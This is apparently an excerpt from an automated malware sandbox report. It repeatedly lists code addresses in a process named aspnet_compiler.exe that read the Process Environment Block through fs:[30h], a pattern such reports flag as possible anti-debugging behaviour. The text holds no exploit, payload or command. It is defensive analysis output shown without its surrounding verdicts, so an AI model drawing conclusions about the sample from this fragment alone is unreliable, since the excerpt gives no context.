Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A740D mov eax, dword ptr fs:[00000030h]	3_2_011A740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A740D mov eax, dword ptr fs:[00000030h]	3_2_011A740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A740D mov eax, dword ptr fs:[00000030h]	3_2_011A740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01191C06 mov eax, dword ptr fs:[00000030h]	3_2_01191C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01191C06 mov eax, dword ptr fs:[00000030h]	3_2_01191C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01191C06 mov eax, dword ptr fs:[00000030h]	3_2_01191C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01191C06 mov eax, dword ptr fs:[00000030h]	3_2_01191C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01191C06 mov eax, dword ptr fs:[00000030h]	3_2_01191C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01191C06 mov eax, dword ptr fs:[00000030h]	3_2_01191C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01191C06 mov eax, dword ptr fs:[00000030h]	3_2_01191C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01191C06 mov eax, dword ptr fs:[00000030h]	3_2_01191C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01191C06 mov eax, dword ptr fs:[00000030h]	3_2_01191C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01191C06 mov eax, dword ptr fs:[00000030h]	3_2_01191C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01191C06 mov eax, dword ptr fs:[00000030h]	3_2_01191C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01191C06 mov eax, dword ptr fs:[00000030h]	3_2_01191C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01191C06 mov eax, dword ptr fs:[00000030h]	3_2_01191C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01191C06 mov eax, dword ptr fs:[00000030h]	3_2_01191C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01156C0A mov eax, dword ptr fs:[00000030h]	3_2_01156C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01156C0A mov eax, dword ptr fs:[00000030h]	3_2_01156C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01156C0A mov eax, dword ptr fs:[00000030h]	3_2_01156C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01156C0A mov eax, dword ptr fs:[00000030h]	3_2_01156C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010EB02A mov eax, dword ptr fs:[00000030h]	3_2_010EB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010EB02A mov eax, dword ptr fs:[00000030h]	3_2_010EB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010EB02A mov eax, dword ptr fs:[00000030h]	3_2_010EB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010EB02A mov eax, dword ptr fs:[00000030h]	3_2_010EB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110BC2C mov eax, dword ptr fs:[00000030h]	3_2_0110BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110002D mov eax, dword ptr fs:[00000030h]	3_2_0110002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110002D mov eax, dword ptr fs:[00000030h]	3_2_0110002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110002D mov eax, dword ptr fs:[00000030h]	3_2_0110002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110002D mov eax, dword ptr fs:[00000030h]	3_2_0110002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110002D mov eax, dword ptr fs:[00000030h]	3_2_0110002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0116C450 mov eax, dword ptr fs:[00000030h]	3_2_0116C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0116C450 mov eax, dword ptr fs:[00000030h]	3_2_0116C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110A44B mov eax, dword ptr fs:[00000030h]	3_2_0110A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010F0050 mov eax, dword ptr fs:[00000030h]	3_2_010F0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010F0050 mov eax, dword ptr fs:[00000030h]	3_2_010F0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010F746D mov eax, dword ptr fs:[00000030h]	3_2_010F746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01192073 mov eax, dword ptr fs:[00000030h]	3_2_01192073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A1074 mov eax, dword ptr fs:[00000030h]	3_2_011A1074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D9080 mov eax, dword ptr fs:[00000030h]	3_2_010D9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01153884 mov eax, dword ptr fs:[00000030h]	3_2_01153884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01153884 mov eax, dword ptr fs:[00000030h]	3_2_01153884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E849B mov eax, dword ptr fs:[00000030h]	3_2_010E849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110F0BF mov ecx, dword ptr fs:[00000030h]	3_2_0110F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110F0BF mov eax, dword ptr fs:[00000030h]	3_2_0110F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110F0BF mov eax, dword ptr fs:[00000030h]	3_2_0110F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011020A0 mov eax, dword ptr fs:[00000030h]	3_2_011020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011020A0 mov eax, dword ptr fs:[00000030h]	3_2_011020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011020A0 mov eax, dword ptr fs:[00000030h]	3_2_011020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011020A0 mov eax, dword ptr fs:[00000030h]	3_2_011020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011020A0 mov eax, dword ptr fs:[00000030h]	3_2_011020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011020A0 mov eax, dword ptr fs:[00000030h]	3_2_011020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011190AF mov eax, dword ptr fs:[00000030h]	3_2_011190AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0116B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0116B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0116B8D0 mov ecx, dword ptr fs:[00000030h]	3_2_0116B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0116B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0116B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0116B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0116B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0116B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0116B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0116B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0116B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A8CD6 mov eax, dword ptr fs:[00000030h]	3_2_011A8CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D58EC mov eax, dword ptr fs:[00000030h]	3_2_010D58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011914FB mov eax, dword ptr fs:[00000030h]	3_2_011914FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01156CF0 mov eax, dword ptr fs:[00000030h]	3_2_01156CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01156CF0 mov eax, dword ptr fs:[00000030h]	3_2_01156CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01156CF0 mov eax, dword ptr fs:[00000030h]	3_2_01156CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0119131B mov eax, dword ptr fs:[00000030h]	3_2_0119131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0116FF10 mov eax, dword ptr fs:[00000030h]	3_2_0116FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0116FF10 mov eax, dword ptr fs:[00000030h]	3_2_0116FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A070D mov eax, dword ptr fs:[00000030h]	3_2_011A070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A070D mov eax, dword ptr fs:[00000030h]	3_2_011A070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010FF716 mov eax, dword ptr fs:[00000030h]	3_2_010FF716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110A70E mov eax, dword ptr fs:[00000030h]	3_2_0110A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110A70E mov eax, dword ptr fs:[00000030h]	3_2_0110A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110E730 mov eax, dword ptr fs:[00000030h]	3_2_0110E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D4F2E mov eax, dword ptr fs:[00000030h]	3_2_010D4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D4F2E mov eax, dword ptr fs:[00000030h]	3_2_010D4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A8B58 mov eax, dword ptr fs:[00000030h]	3_2_011A8B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010DDB40 mov eax, dword ptr fs:[00000030h]	3_2_010DDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010EEF40 mov eax, dword ptr fs:[00000030h]	3_2_010EEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010DF358 mov eax, dword ptr fs:[00000030h]	3_2_010DF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01103B7A mov eax, dword ptr fs:[00000030h]	3_2_01103B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01103B7A mov eax, dword ptr fs:[00000030h]	3_2_01103B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010DDB60 mov ecx, dword ptr fs:[00000030h]	3_2_010DDB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010EFF60 mov eax, dword ptr fs:[00000030h]	3_2_010EFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A8F6A mov eax, dword ptr fs:[00000030h]	3_2_011A8F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110B390 mov eax, dword ptr fs:[00000030h]	3_2_0110B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E1B8F mov eax, dword ptr fs:[00000030h]	3_2_010E1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E1B8F mov eax, dword ptr fs:[00000030h]	3_2_010E1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01157794 mov eax, dword ptr fs:[00000030h]	3_2_01157794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01157794 mov eax, dword ptr fs:[00000030h]	3_2_01157794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01157794 mov eax, dword ptr fs:[00000030h]	3_2_01157794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01102397 mov eax, dword ptr fs:[00000030h]	3_2_01102397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0119138A mov eax, dword ptr fs:[00000030h]	3_2_0119138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0118D380 mov ecx, dword ptr fs:[00000030h]	3_2_0118D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E8794 mov eax, dword ptr fs:[00000030h]	3_2_010E8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01104BAD mov eax, dword ptr fs:[00000030h]	3_2_01104BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01104BAD mov eax, dword ptr fs:[00000030h]	3_2_01104BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01104BAD mov eax, dword ptr fs:[00000030h]	3_2_01104BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A5BA5 mov eax, dword ptr fs:[00000030h]	3_2_011A5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011553CA mov eax, dword ptr fs:[00000030h]	3_2_011553CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011553CA mov eax, dword ptr fs:[00000030h]	3_2_011553CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011137F5 mov eax, dword ptr fs:[00000030h]	3_2_011137F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010FDBE9 mov eax, dword ptr fs:[00000030h]	3_2_010FDBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011003E2 mov eax, dword ptr fs:[00000030h]	3_2_011003E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011003E2 mov eax, dword ptr fs:[00000030h]	3_2_011003E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011003E2 mov eax, dword ptr fs:[00000030h]	3_2_011003E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011003E2 mov eax, dword ptr fs:[00000030h]	3_2_011003E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011003E2 mov eax, dword ptr fs:[00000030h]	3_2_011003E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011003E2 mov eax, dword ptr fs:[00000030h]	3_2_011003E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E8A0A mov eax, dword ptr fs:[00000030h]	3_2_010E8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110A61C mov eax, dword ptr fs:[00000030h]	3_2_0110A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110A61C mov eax, dword ptr fs:[00000030h]	3_2_0110A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010DC600 mov eax, dword ptr fs:[00000030h]	3_2_010DC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010DC600 mov eax, dword ptr fs:[00000030h]	3_2_010DC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010DC600 mov eax, dword ptr fs:[00000030h]	3_2_010DC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01108E00 mov eax, dword ptr fs:[00000030h]	3_2_01108E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01191608 mov eax, dword ptr fs:[00000030h]	3_2_01191608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010F3A1C mov eax, dword ptr fs:[00000030h]	3_2_010F3A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010DAA16 mov eax, dword ptr fs:[00000030h]	3_2_010DAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010DAA16 mov eax, dword ptr fs:[00000030h]	3_2_010DAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D5210 mov eax, dword ptr fs:[00000030h]	3_2_010D5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D5210 mov ecx, dword ptr fs:[00000030h]	3_2_010D5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D5210 mov eax, dword ptr fs:[00000030h]	3_2_010D5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D5210 mov eax, dword ptr fs:[00000030h]	3_2_010D5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0118FE3F mov eax, dword ptr fs:[00000030h]	3_2_0118FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010DE620 mov eax, dword ptr fs:[00000030h]	3_2_010DE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01114A2C mov eax, dword ptr fs:[00000030h]	3_2_01114A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01114A2C mov eax, dword ptr fs:[00000030h]	3_2_01114A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01164257 mov eax, dword ptr fs:[00000030h]	3_2_01164257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0119EA55 mov eax, dword ptr fs:[00000030h]	3_2_0119EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D9240 mov eax, dword ptr fs:[00000030h]	3_2_010D9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D9240 mov eax, dword ptr fs:[00000030h]	3_2_010D9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D9240 mov eax, dword ptr fs:[00000030h]	3_2_010D9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D9240 mov eax, dword ptr fs:[00000030h]	3_2_010D9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E7E41 mov eax, dword ptr fs:[00000030h]	3_2_010E7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E7E41 mov eax, dword ptr fs:[00000030h]	3_2_010E7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E7E41 mov eax, dword ptr fs:[00000030h]	3_2_010E7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E7E41 mov eax, dword ptr fs:[00000030h]	3_2_010E7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E7E41 mov eax, dword ptr fs:[00000030h]	3_2_010E7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E7E41 mov eax, dword ptr fs:[00000030h]	3_2_010E7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0119AE44 mov eax, dword ptr fs:[00000030h]	3_2_0119AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0119AE44 mov eax, dword ptr fs:[00000030h]	3_2_0119AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E766D mov eax, dword ptr fs:[00000030h]	3_2_010E766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0111927A mov eax, dword ptr fs:[00000030h]	3_2_0111927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0118B260 mov eax, dword ptr fs:[00000030h]	3_2_0118B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0118B260 mov eax, dword ptr fs:[00000030h]	3_2_0118B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A8A62 mov eax, dword ptr fs:[00000030h]	3_2_011A8A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010FAE73 mov eax, dword ptr fs:[00000030h]	3_2_010FAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010FAE73 mov eax, dword ptr fs:[00000030h]	3_2_010FAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010FAE73 mov eax, dword ptr fs:[00000030h]	3_2_010FAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010FAE73 mov eax, dword ptr fs:[00000030h]	3_2_010FAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010FAE73 mov eax, dword ptr fs:[00000030h]	3_2_010FAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110D294 mov eax, dword ptr fs:[00000030h]	3_2_0110D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110D294 mov eax, dword ptr fs:[00000030h]	3_2_0110D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0116FE87 mov eax, dword ptr fs:[00000030h]	3_2_0116FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110FAB0 mov eax, dword ptr fs:[00000030h]	3_2_0110FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D52A5 mov eax, dword ptr fs:[00000030h]	3_2_010D52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D52A5 mov eax, dword ptr fs:[00000030h]	3_2_010D52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D52A5 mov eax, dword ptr fs:[00000030h]	3_2_010D52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D52A5 mov eax, dword ptr fs:[00000030h]	3_2_010D52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D52A5 mov eax, dword ptr fs:[00000030h]	3_2_010D52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011546A7 mov eax, dword ptr fs:[00000030h]	3_2_011546A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010EAAB0 mov eax, dword ptr fs:[00000030h]	3_2_010EAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010EAAB0 mov eax, dword ptr fs:[00000030h]	3_2_010EAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A0EA5 mov eax, dword ptr fs:[00000030h]	3_2_011A0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A0EA5 mov eax, dword ptr fs:[00000030h]	3_2_011A0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A0EA5 mov eax, dword ptr fs:[00000030h]	3_2_011A0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A8ED6 mov eax, dword ptr fs:[00000030h]	3_2_011A8ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01118EC7 mov eax, dword ptr fs:[00000030h]	3_2_01118EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0118FEC0 mov eax, dword ptr fs:[00000030h]	3_2_0118FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01102ACB mov eax, dword ptr fs:[00000030h]	3_2_01102ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011036CC mov eax, dword ptr fs:[00000030h]	3_2_011036CC
